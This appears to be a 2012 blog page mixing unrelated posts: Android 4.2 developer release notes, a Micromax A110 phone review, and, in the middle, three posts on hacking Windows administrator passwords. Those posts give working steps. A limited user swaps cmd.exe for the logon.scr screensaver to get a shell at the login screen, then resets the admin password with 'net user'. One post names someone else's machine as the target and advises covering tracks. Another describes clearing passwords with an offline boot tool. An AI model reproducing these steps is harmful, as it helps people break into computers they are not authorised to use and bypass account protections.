Thursday, November 15, 2012


Welcome to Android 4.2, the latest version ofJelly Bean!
Android 4.2 has performance optimizations, a refreshed system UI, and great new features for users and developers. This document provides a glimpse of what's new for developers.
See the Android 4.2 APIs document for a detailed look at the new developer APIs.
Find out more about the new Jelly Bean features for users at www.android.com.

Faster, Smoother, More Responsive


Android 4.2 builds on the performance improvements already included in Jelly Bean —vsync timingtriple bufferingreduced touch latency, and CPU input boost — and adds new optimizations that make Android even faster.
Improvements in the hardware-accelerated 2D renderer make common animations such as scrolling and swiping smoother and faster. In particular, drawing is optimized for layers, clipping and certain shapes (rounded rects, circles and ovals).
A variety of WebView rendering optimizations make scrolling of web pages smoother and free from jitter and lags.
Android’s Renderscript Compute is the first computation platform ported to run directly on a mobile device GPU. It automatically takes advantage of GPU computation resources whenever possible, dramatically improving performance for graphics and image processing. Any app using Renderscript on a supported device can benefit immediately from this GPU integration without recompiling.
10-inch tablet running Android 4.2

Refined, refreshed UI


Android 4.2 refines the Jelly Bean user experience and brings familiar Android UI patterns such as status bar, system bar, and notifications window to all tablets.
All screen sizes now feature the status bar on top, with pull-down access to notifications and a new Quick Settings menu. The familiar system bar appears on the bottom, with buttons easily accessible from either hand. The Application Tray is also available on all screen sizes.

One tablet, many users


Now several users can share a single Android tablet, with each user having convenient access to a dedicated user space. Users can switch to their spaces with a single touch from the lock screen.
On a multiuser device, Android gives each user a separate environment, including user-specific emulated SD card storage. Users also have their own homescreens, widgets, accounts, settings, files, and apps, and the system keeps these separate. All users share core system services, but the system ensures that each user's applications and data remain isolated. In effect, each of the multiple users has his or her own Android device.
Users can install and uninstall apps at any time in their own environments. To save storage space, Google Play downloads an APK only if it's not already installed by another user on the device. If the app is already installed, Google Play records the new user's installation in the usual way but doesn't download another copy of the app. Multiple users can run the same copy of an APK because the system creates a new instance for each user, including a user-specific data directory.
For developers, multi-user support is transparent — your apps do not need to do anything special to run normally in a multi-user environment and there are no changes you need to make in your existing or published APKs. The system manages your app in each user space just as it does in a single-user environment.

New ways to engage users


Calendar lock screen widget
You can extend app widgets to run on the lock screen, for instant access to your content.

Lock screen widgets

In Android 4.2, users can place app widgets directly on their lock screens, for instant access to favorite app content without having to unlock. Users can add as many as five lock screen widgets, choosing from widgets provided by installed apps. The lock screen displays each widget in its own panel, letting users swipe left and right to view different panels and their widgets.
Like all app widgets, lock screen widgets can display any kind of contentand they can accept direct user interaction. They can be entirely self-contained, such as a widget that offers controls to play music, or they can let users jump straight to an Activity in your app, after unlocking along the way as needed.
For developers, lock screen widgets offer a great new way to engage users. They let you put your content in front of users in a location they’ll see often, and they give you more opportunities to bring users directly into your app.
You can take advantage of this new capability by building a new app widget or by extending an existing home screen widget. If your app already includes home screen widgets, you can extend them to the lock screen with minimal change. To give users an optimal experience, you can update the widget to use the full lock screen area when available and resize when needed on smaller screens. You can also add features to your widgets that might be especially useful or convenient on the lock screen.

Daydream

Daydream is an interactive screensaver mode that starts when a user’s device is docked or charging. In this mode, the system launches a daydream — a remote content service provided by an installed app — as the device screensaver. A user can enable Daydream from the Settings app and then choose the daydream to display.
Daydreams combine the best capabilities of live wallpapers and home screen widgets, but they are more powerful. They let you offer the any kind of content in a completely new context, with user interactions such as flipping through photos, playing audio or video, or jumping straight into your app with a single touch.
Because daydreams can start automatically when a device is charging or docked, they also give your app a great way to support new types of user experiences, such as leanback or exhibition mode, demo or kiosk mode, and "attract mode" — all without requiring special hardware.
Daydream screensaver mode
Daydream lets you create powerful interactive screensavers that display any kind of content.
Daydreams are similar to Activities and can do anything that Activity can do — from rendering a UI hierarchy (without using RemoteViews) to drawing directly using Canvas, OpenGL, SurfaceTexture, and more. They can play video and audio and they can even accept direct user interaction. However, daydreams are not Activities, so they don’t affect the backstack or appear in Recents and they cannot be launched directly from your app.
Implementing a daydream is straightforward and you can take advantage of UI components and resources that you’ve already created for other parts of your app. You can provide multiple daydreams in your app and you can offer distinct content and display settings for each.

External display support


Android 4.2 introduces platform support for external displays that goes far beyond mirroring — apps can now target unique content to any one or multiple displays that are attached to an Android device. Apps can build on this to deliver new kinds of interaction and entertainment experiences to users.

Display manager

Apps interact with displays through a new display manager system service. Your app can enumerate the displays and check the capabilities of each, including size, density, display name, ID, support for secure video, and more. Your app can also receive callbacks when displays are added or removed or when their capabilities change, to better manage your content on external displays.

Presentation window

To make it easy to show content on an external display, the framework provides a new UI object called a Presentation — a type of dialog that represents a window for your app’s content on a specific external display. Your app just gives the display to use, a theme for the window, and any unique content to show. The Presentation handles inflating resources and rendering your content according to the characteristics of the targeted display.
You can take full control of two or more independent displays using Presentation.
A Presentation gives your app full control over the remote display window and its content and lets you manage it based on user input events such as key presses, gestures, motion events, and more. You can use all of the normal tools to create a UI and render content in the Presentation, from building an arbitrary view hierarchy to using SurfaceView or SurfaceTexture to draw directly into the window for streamed content or camera previews.

Preferred display selection

When multiple external displays are available, you can create as many Presentations as you need, with each one showing unique content on a specific display. In many cases, you might only want to show your content on a single external display — but always on the that’s best for Presentation content. For this, the system can help your app choose the best display to use.
To find the best display to use, your app can query the display manager for the system’s preferred Presentation displayand receive callbacks when that display changes. Alternatively, you can use the media router service, extended in Android 4.2, to receive notifications when a system video route changes. Your app can display content by default in the main Activity until a preferred Presentation display is attached, at which time it can automatically switch to Presentation content on the preferred display. Your apps can also use media router’s MediaRouteActionProvider and MediaRouteButton to offer standard display-selection UI.

Protected content

For apps that handle protected or encrypted content, the display API now reports the secure video capabilities of attached displays. Your app query a display to find out if it offers a secure video output or provides protected graphics buffers and then choose the appropriate content stream or decoding to make the content viewable. For additional security on SurfaceView objects, your app can set a secure flag to indicate that the contents should never appear in screenshots or on a non-secure display output, even when mirrored.

Wireless display

Starting in Android 4.2, users on supported devices can connect to an external display over Wi-Fi, using Miracast, a peer-to-peer wireless display standard created by the Wi-Fi Alliance. When a wireless display is connected, users can stream any type of content to the big screen, including photos, games, maps, and more.
Apps can take advantage of wireless displays in the same way as they do other external displays and no extra work is needed. The system manages the network connection and streams your Presentation or other app content to the wireless display as needed.

Native RTL support


RTL layout mirroring
Developers can now mirror their layouts for RTL languages.
Android 4.2 introduces full native support for RTL (right-to-left) layouts, including layout mirroring. With native RTL support, you can deliver the same great app experience to all of your users, whether their language uses a script that reads right-to-left or one that reads left-to-right.
When the user switches the system language to a right-to-left script, the system now provides automatic mirroring of app UI layouts and all view widgets, in addition to bidi mirroring of text elements for both reading and character input.
Your app can take advantage of RTL layout mirroring in your app with minimal effort. If you want the app to be mirrored, you simply declare a new attribute in your app manifest and change all "left/right" layout properties to new "start/end" equivalents. The system then handles the mirroring and display of your UI as appropriate.
For precise control over your app UI, Android 4.2 includes new APIs that let you manage layout direction, text direction, text alignment, gravity, and locale direction in View components. You can even create custom versions of layout, drawables, and other resources for display when a right-to-left script is in use.
To help you debug and optimize your custom right-to-left layouts, the HierarchyViewer tool now lets you see start/end properties, layout direction, text direction, and text alignment for all the Views in the hierarchy,

Enhancements for international languages


Android 4.2 includes a variety of font and character optimizations for international users:
  • For Korean users, a new font choice is available — Nanum (나눔글꼴) Gothic, a unicode font designed especially for the Korean-language script.
  • Improved support for Japanese vertical text displayed in WebViews.
  • Improved font kerning and positioning for Indic, Thai, Arabic, and Hebrew default fonts.
The default Android keyboard also includes an updated set of dictionaries:
  • Improved dictionaries for French (with bigram support), English, and Russian
  • New dictionaries for Danish, Greek, Finnish, Lithuanian, Latvian, Polish, Slovenian, Serbian, Swedish, Turkish

New ways to create beautiful UI


Nested Fragments

For more control over your UI components and to make them more modular, Android 4.2 lets you nest Fragments inside of Fragments. For any Fragment, a new Fragment manager lets you insert other Fragments as child nodes in the View hierarchy.
You can use nested Fragments in a variety of ways, but they are especially useful for implementing dynamic and reusable UI components inside of a UI component that is itself dynamic and reusable. For example, if you use ViewPager to create fragments that swipe left and right, you can now insert fragments into each Fragment of the view pager.
To let you take advantage of nested Fragments more broadly in your app, this capability is added to the latest version of the Android Support Library.

Accessibility


The system now helps accessibility services distinguish between touch exploration and accessibility gestures while in touch-exploration mode. When a user touches the screen, the system notifies the service that a generic touch interaction has started. It then tracks the speed of the touch interaction and determines whether it is a touch exploration (slow) or accessibility gesture (fast) and notifies the service. When the touch interaction ends, the system notifies the service.
The system provides a new global accessibility option that lets an accessibility service open the Quick Settings menu based on an action by the user. Also added in Android 4.2 is a new accessibility feedback type for Braille devices.
To give accessibility services insight into the meaning of Views for accessibility purposes, the framework provides new APIs for associating a View as the label for another View. The label for each View is available to accessibility services through AccessibilityNodeInfo.

Improved Camera with HDR


Android 4.2 introduces a new camera hardware interface and pipeline for improved performance. On supported devices, apps can use a new HDR camera scene mode to capture an image using high dynamic range imaging techniques.
Additionally, the framework now provides an API to let apps check whether the camera shutter sound can be disabled. Apps can then let the user disable the sound or choose an alternative sound in place of the standard shutter sound, which is recommended.

Renderscript Computation


In Android 4.2, Renderscript Compute introduces new scripting features, new optimizations, and direct GPU integration for the highest performance in computation operations.

Filterscript

Filterscript is a subset of Renderscript that is focused on optimized image processing across a broad range of device chipsets. Developers can write their image processing operations in Filterscript using the standard Renderscript runtime API, but within stricter constraints that ensure wider compatibility and improved optimization across CPUs, GPUs, and DSPs.
Filterscript is ideal for hardware-accelerating simple image-processing and computation operations such as those that might be written for OpenGL ES fragment shaders. Because it places a relaxed set of constraints on hardware, your operations are optimized and accelerated on more types of device chipsets. Any app targeting API level 17 or higher can make use of Filterscript.

Script intrinsics

In Android 4.2, Renderscript adds support for a set of script intrinsics — pre-implemented filtering primitives that are accelerated to reduce the amount of code that you need to write and to ensure that your app gets the maximum performance gain possible.
Intrinsics are available for blends, blur, color matrix, 3x3 and 5x5 convolve, per-channel lookup table, and converting an Android YUV buffer to RGB.

Script groups

You can now create groups of Renderscript scripts and execute them all with a single call as though they were part of a single script. This allows Renderscript to optimize execution of the scripts in ways that it could not do if the scripts were executed individually.
Renderscipt optimizations chart
Renderscript image-processing benchmarks run on different Android platform versions (Android 4.0, 4.1, and 4.2) in CPU only on a Galaxy Nexus device.
Renderscript image-processing benchmarks comparing operations run with GPU + CPU to those run in CPU only on the same Nexus 10 device.
If you have a direct acyclic graph of Renderscript operations to run, you can use a builder class to create a script group defining the operations. At execution time, Renderscript optimizes the run order and the connections between these operations for best performance.

Ongoing optimization improvements

When you use Renderscript for computation operations, you apps benefit from ongoing performance and optimization improvements in the Renderscript engine itself, without any impact on your app code or any need for recompilation.
As optimization improves, your operations execute faster and on more chipsets, without any work on your part. The chart at right highlights the performance gain delivered by ongoing Renderscript optimization improvements across successive versions of the Android platform.

GPU Compute

Renderscript Compute is the first computation platform ported to run directly on a mobile device GPU. It now automatically takes advantage of GPU computation resources whenver possible to improve performance. With GPU integration, even the most complex computations for graphics or image processing can execute with dramatically improved performance.
Any app using Renderscript on a supported device can benefit immediately from this GPU integration, without recompiling. The Nexus 10 tablet is the first device to support this integration.

New built-in developer options


The Android 4.2 system includes a variety of new developer options that make it easier to create great looking apps that perform well. The new options expose features for debugging and profiling your app from any device or emulator.
On devices running Android 4.2, developer options are hidden by default, helping to create a better experience for users. You can reveal the developer options at any time by tapping 7 times on Settings > About phone > Build number on any compatible Android device.
New developer options give you more ways to profile and debug on a device.
New developer options in Android 4.2 include:
  • Take bug report — immediately takes a screen shot and dumps device state information to local file storage, then attaches them to a new outgoing email message.
  • Power menu bug reports — Adds a new option to the device power menu and quick settings to take a bug report (see above).
  • Verify apps over usb — Allows you to disable app checks for sideloading apps over USB, while still checking apps from other sources like the browser. This can speed up the development process while keeping the security feature enabled.
  • Show hardware layers updates — Flashes hardware layers green when they update.
  • Show GPU overdraw — Highlights GPU overdraw areas.
  • Force 4x MSAA — Enables 4x MSAA in Open GL ES 2.0 apps.
  • Simulate secondary displays — Creates one or more non-secure overlay windows on the current screen for use as a simulated remote display. You can control the simulated display’s size and density.
  • Enable OpenGL traces — Lets you trace OpenGL execution using Logcat, Systrace, or callstack on glGetError.

New Platform Technologies


Android 4.2 includes a variety of new and enhanced platform technologies to support innovative communications use-cases across a broad range of hardware devices. In most cases, the new platform technologies and enhancements do not directly affect your apps, so you can benefit from them without any modification.

Security enhancements

Every Android release includes dozens of security enhancements to protect users. Here are some of the enhancements in Android 4.2:
  • Application verification — Users can choose to enable “Verify Apps" and have applications screened by an application verifier, prior to installation. App verification can alert the user if they try to install an app that might be harmful; if an application is especially bad, it can block installation.
  • More control of premium SMS — Android will provide a notification if an application attempts to send SMS to a short code that uses premium services which might cause additional charges. The user can choose whether to allow the application to send the message or block it.
  • Always-on VPN — VPN can be configured so that applications will not have access to the network until a VPN connection is established. This prevents applications from sending data across other networks.
  • Certificate Pinning — The libcore SSL implementation now supports certificate pinning. Pinned domains will receive a certificate validation failure if the certificate does not chain to a set of expected certificates. This protects against possible compromise of Certificate Authorities.
  • Improved display of Android permissions — Permissions have been organized into groups that are more easily understood by users. During review of the permissions, the user can click on the permission to see more detailed information about the permission.
  • installd hardening — The installd daemon does not run as the root user, reducing potential attack surface for root privilege escalation.
  • init script hardening — init scripts now apply O_NOFOLLOW semantics to prevent symlink related attacks.
  • FORTIFY_SOURCE — Android now implements FORTIFY_SOURCE. This is used by system libraries and applications to prevent memory corruption.
  • ContentProvider default configuration — Applications which target API level 17 will have “export” set to “false” by default for each ContentProvider, reducing default attack surface for applications.
  • Cryptography — Modified the default implementations of SecureRandom and Cipher.RSA to use OpenSSL. Added SSLSocket support for TLSv1.1 and TLSv1.2 using OpenSSL 1.0.1
  • Security Fixes — Upgraded open source libraries with security fixes include WebKit, libpng, OpenSSL, and LibXML. Android 4.2 also includes fixes for Android-specific vulnerabilities. Information about these vulnerabilities has been provided to Open Handset Alliance members and fixes are available in Android Open Source Project. To improve security, some devices with earlier versions of Android may also include these fixes.

New Bluetooth stack

Android 4.2 introduces a new Bluetooth stack optimized for use with Android devices. The new Bluetooth stack developed in collaboration between Google and Broadcom replaces the stack based on BlueZ and provides improved compatibility and reliability.

Low-latency audio

Android 4.2 improves support for low-latency audio playback, starting from the improvements made in Android 4.1 release for audio output latency using OpenSL ES, Soundpool and tone generator APIs. These improvements depend on hardware support — devices that offer these low-latency audio features can advertise their support to apps through a hardware feature constant. New AudioManager APIs are provided to query the native audio sample rate and buffer size, for use on devices which claim this feature.

New camera hardware interface

Android 4.2 introduces a new implementation of the camera stack. The camera subsystem includes the implementations for components in the camera pipeline such as burst mode capture with processing controls.

New NFC hardware interface and controller interface

Android 4.2 introduces support for controllers based on the NCI standard from the NFC-Forum. NCI provides a standard communication protocol between an NFC Controller (NFCC) and a device Host, and the new NFC stack developed in collaboration between Google and Broadcom supports it.

Dalvik runtime optimizations

The Dalvik runtime includes enhancements for performance and security across a wider range of architectures:
  • x86 JIT support from Intel and MIPS JIT support from MIPS
  • Optimized garbage-collection parameters for devices with > 512MB
  • Default implementations of SecureRandom and Cipher.RSA now use OpenSSL
  • SSLSocket support for TLSv1.1 and TLSv1.2 via OpenSSL 1.0.1
  • New intrinsic support for StrictMath methods abs, min, max, and sqrt
  • BouncyCastle updated to 1.47
  • zlib updated to 1.27
  • dlmalloc updated to 2.8.6

Wednesday, November 7, 2012

How to Hack Administrator Password of Window XP without PC Open!!


How to Hack Administrator Password of Window XP without PC Open!!

Posted: WINDOWS HackWindows Password Hack
Tags: ,

Lets do it fast….
1. Go to Start –> Run –> Type in CMD
2. Enter command: cd\ windows\system32
3. mkdir newpass
4. copy logon.scr newpass\logon.scr
5. copy cmd.exe newpass\cmd.exe
6. del logon.scr
7. rename cmd.exe logon.scr
So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command
net user password
Example: If the admin username is ‘jaiminworld’ and you want change the password to ‘yourpassword’ Then type in the following command
net user jaiminworld yourpassword
This will change the administrator password to yourpassword.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do
.

How to hack windows XP admin password


How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user <admin account name here> password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

How to Hack Windows Administrator Password


How to Hack Windows Administrator Password


How to Hack Windows Admin PasswordThis hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So, if you are somewhat in a same kind of situation, here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer.
You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:
  • You do not need to know the old password to set a new one.
  • This tool can detect and unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it Works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence, it is necessary that you boot off your computer and access this sam file via the boot menu. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below:
It is recommended that you download the CD version of the tool since the floppy drive is outdated or doesn’t exist in today’s computer. After the download, you’ll get a bootable image which you need to burn it onto a blank CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another Simple Way to Reset Non-Administrator Account Passwords:

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task:
  1. Open the command prompt (Start -> Run -> type cmd -> Enter)
  2. Now type net user and hit Enter
  3. Now the system will show you a list of user accounts on the computer. Say for example, you need to reset the password of the account by nameJohn, then do as follows:
  4. Type net user John * and hit Enter. Now, the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So, in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps
.

Micromax A110 Superfone Canvas 2 review


Micromax A110 Superfone Canvas 2 review

micromax a110 superfone canvas 2 7 Micromax A110 Superfone Canvas 2 reviewMicromax is back with yet another 5-inch smartphone in its Superfone series, a successor to company’s original A100 Superfone Canvas, A110Canvas 2 comes with a lot of improvements including a dual-core processor for more processing power.
On paper, Micromax A110 looks like a great device, but is A110 worth considering, or is it just a cheap knockoff of Galaxy Note, we will find out in this review.

Phonemicromax superfone canvas 2 a110 1small Micromax A110 Superfone Canvas 2 reviewMicromax Superfone Canvas 2 A110micromax superfone canvas a100small Micromax A110 Superfone Canvas 2 reviewMicromax Superfone Canvas A100Micromax A101 1 small Micromax A110 Superfone Canvas 2 reviewMicromax Superfone A101
Display5.0-inch 854x480p resolution IPS capacitive display5.0-inch 854x480p resolution TFT capacitive display5.2-inch 800x480p resolution TFT capacitive display
Processor1GHz dual-core1GHz1GHz dual-core
RAM512MB512MBUnknown
Internal Storage2.5GB4GB1.2GB
microSD card slotYesYesYes
Battery2000 mAh2000 mAh2000 mAh
Cameras8MP rear/ 0.3MP front5MP rear/ 0.3MP front5MP rear/ 0.3MP front
Android versionAndroid 4.0Android 4.0Android 4.0
ConnectivityWi-Fi, Bluetooth, MicroUSB, dual-SIMWi-Fi, Bluetooth, MicroUSB, dual-SIMWi-Fi, Bluetooth, MicroUSB, dual-SIM
PriceINR 9,999INR 9,799INR 9,999

In the box:

The box contents are pretty basic, you will find the phone, battery, headphones, data cum charging cable and a travel adapter along with phone guide and warranty statement.micromax a110 superfone canvas 2 11 Micromax A110 Superfone Canvas 2 review

Hardware

As you would expect with any device sporting a 5-inch display, the Micromax A110 is huge and if you were using comparably smaller devices till now, you would really need time in getting used to it. Personally, I use a Galaxy Nexus, which is no small device, but still Micromax A110 was too big for me.
Coming to the build, the smartphone is sturdy and should be able to take the occasional falls. The front largely includes the display, apart from the capacitive keys, ear-piece, front camera, LED indicator and sensors.
The back is textured plastic, which helps in holding this large piece of hardware, and houses an 8MP camera, dual-LED flash, speakers and Micromax branding.micromax a110 superfone canvas 2 12 Micromax A110 Superfone Canvas 2 review
There is a grey-silver metal-finish on the curved sides. The power button is located on the right similar to Samsung devices, left houses the volume rocker and both Micro-USB and 3.5mm headphone jack are present on the top.
Overall, the Micromax A110 is a thin and solid device, which looks decent, but unless you are really looking for a big display, you are better off with smaller phones.

Display

Micromax has gone with an IPS display on the A110, which is quite good. The 5-inch screen looks nice and colour reproduction is also good, although we would have liked better blacks. Thanks to IPS, the viewing angles are better than average phones at this pricing.
On the resolution front, the display has 854x480p resolution, which isn’t really great and we would have liked at-least qHD resolution, but considering the pricing, we can’t really expect too much.
The touch sensitivity is good and we have no issues whatsoever, which clearly shows how even budget phones have come in the last couple of years. I remember using capacitive displays in LG Optimus One or Samsung’s Galaxy Spica, and Micromax A110 is a lot better than them.
Overall the large display on the device is a boon for heavy media consumers, watching Youtube videos or movies and even reading content is great on this phone.

Camera

Micromax has included an 8MP rear camera on the A110, which is an improvement from 5MP in its predecessor A100. Although we were left wanting more from the camera on-board, clearly in-order for fit the phone in this budget, Micromax hasn’t used a great sensor, thus you won’t really get the camera output, you might expect. That said, the performance of the camera isn’t bad either, it is okay, and should satisfy your basic imaging needs.micromax a110 superfone canvas 2 2 Micromax A110 Superfone Canvas 2 review
The low-light performance is on the downside, but the outdoor or even indoor shots in decently lit locations turn out fine.
There is also a VGA front camera on-board, which is so-so but should be more than enough for your Skyping needs or for 3G video calls. As there is no Face Unlock feature, you won’t be able to use your front camera for that.
The camera app on the phone is pretty much stock, but we did find a cool new feature – multi-angle shot. It is very much similar to what Google has introduced in the Android 4.2 – Photo Sphere, but unlike Photo Sphere, you can only take a multi-angle shots in one direction on A110. The default gallery app supports viewing of these photos in different angles.
The camera also include HDR mode, colour effects and scene types.

Software/ Interface

Screenshot micromax a110 4 Micromax A110 Superfone Canvas 2 reviewMicromax has pre-loaded Android 4.0.4 on the device, and the interface is largely untouched apart from odd tweaks here and there. The company has however used its own icon-set, rather than stock icons, which makes the UI look more third-party than vanilla.
Considering the rate at which Micromax is dropping phones and we don’t expect to see Jelly Bean on this phone, although we would like it and Project Butter improvements and Google Now will certainly be welcome additions.
The capacitive button placement includes usual menu button apart from home and back, unlike the Google way, where the search giant is trying to get rid of menu button. You can get the task-switcher by long pressing the home button.
Screenshot micromax a110 14 Micromax A110 Superfone Canvas 2 reviewThe re-sizable widgets, revamped UI and most of these Ice Cream Sandwich features are here, but you won’t find any Face Unlock.
Thanks to the pretty-much stock interface, the performance is smooth and snappy.
In terms of the tweaks, quick setting toggles are present in the notification shade; good-old Nokia type profiles have also been included along with a new setting to schedule power-on/off for the device.
Company has pre-loaded some third-party trial games on the device including its own bloatware like Hookup (a Whatsapp alternative from the company), M! Zone, M! Store and M! Buddy. Most of these are useless and I don’t think most of you even going to open them.
The phone also supports 3G video calling natively, which is a plus and some of you might find it a welcome addition as older Android smartphones often did not have 3G video calling support.

Performance/ Battery Life

Screenshot micromax a110 10 Micromax A110 Superfone Canvas 2 reviewMicromax’s first phablet A100 had a single-core processor and that has changed to dual-core in A110. Company has included a 1GHz MediaTak 6577 dual-core processor along with 512MB RAM, which is enough for a decent performance.
The overall performance of the device is good and we had no issues during our normal usage apart from odd hiccups and some slowness in the stock browser with the image-heavy websites.
You can play all the casual games smoothly; however some of the games like Shadowgun were not support probably because of the processor. Somehow NOVA 3 also kept giving me lack of memory despite SD card having over 2GB of free space. Dead Trigger however worked flawlessly.
The stock video player on the smartphone does not support 1080p playback, but you can play these files using the software decoder on MX Player.
On the battery front, 2000 mAh battery on-board packs a lot of juice and would last more than a day on the medium usage.
The smartphone supports two GSM SIM cards (dual-Standby), one of which can support 3G, other is 2G only.  There are detailed options for what, you want to use which SIM in the settings menu and also the first time you place a voice call or send a message or such action, the phonewill prompt you the selection of SIM to use for that particular SIM.
Bluetooth, GPS and Wi-Fi also worked fine and we had no issues.micromax a110 superfone canvas 2 9 Micromax A110 Superfone Canvas 2 review

Verdict: Should you buy Micromax A110 Superfone Canvas 2?

Micromax has come out with a quite good 5-inch smartphone in the form of A110 Superfone Canvas 2. The performance is decent, as is the IPS display on-board. There are odd issues here and there but nothing seems to be a deal-breaker. Camera performance is okayish, not really the quality one would expect from an 8MP camera.
Overall, if you are looking for a big-display Android smartphone in a limited budget, A110 is good choice and we don’t think you will be disappointed, however if you are just looking for a smartphone with normal sized display, A110 is not for you, you are better off with something like A90S or similar.
Micromax A110 Price: INR 9,999
Ratings (out of 10):
  • Display: 7
  • Software/ Ecosystem: 8
  • Performance: 7
  • Value for money: 9
  • Camera: 6
  • Battery Life: 7
  • Design/ Build: 7
  • Overall: 7

By : Siddharth Rajput